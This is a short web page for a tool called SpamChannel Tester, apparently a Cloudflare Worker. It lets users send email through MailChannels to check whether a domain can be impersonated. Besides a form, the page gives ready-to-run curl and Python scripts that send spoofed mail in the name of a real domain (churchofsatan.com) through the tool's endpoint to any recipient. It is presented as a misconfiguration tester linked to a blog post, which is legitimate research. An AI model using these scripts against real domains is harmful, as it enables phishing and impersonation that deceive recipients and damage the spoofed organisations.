SpamChannel Tester

For more info see this blog post. The code for this Cloudflare Worker is here.

Use the below form to send an email and test if a domain using MailChannels is misconfigured and can be impersonated.


(*) is required








Mimetype:



... or do it programmatically

For a complete list of options see the MailChannels Transactional API docs.

The below examples will send a spoofed email from churchofsatan.com.


Curl:

      
curl -X POST \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
"https://spamchannel.haxxx.workers.dev/" \
-d '{
  "personalizations" : [ {
    "to" : [{
      "name" : "",
      "email" : "my@email.com"
  }]}],
  "from": { "email":"lucifer@churchofsatan.com", "name": "Lucifer"},
  "subject" : "Hell is hot",
  "content" : [{
    "type" : "text/plain",
    "value" : "Send aircon hot af down here"
  }]
}'
      
    

Python:

      
#! /usr/bin/env python3

# This sends an HTML email
# Example: python spam.py myemail.html

import sys
import requests

sender_email = 'satan@churchofsatan.com'
receiver_email = 'me@email.com'

with open(sys.argv[1], 'r') as email_html_file:
  email_html = email_html_file.read()

email_json = {
  "personalizations": [
    {
      "to": [
        {
          "email": receiver_email,
        }
      ]
    }
  ],
  "from": {
    "email": sender_email,
    "name": "Lucifer"
  },
  "subject": "Hell is hot",
  "content": [
    {
      "type": "text/html",
      "value": email_html
    }
  ]
}

print(f"Sending to {receiver_email} from {sender_email}")
r = requests.post(
  'https://spamchannel.haxxx.workers.dev/',
  json=email_json
)
print(r.text, r.status_code)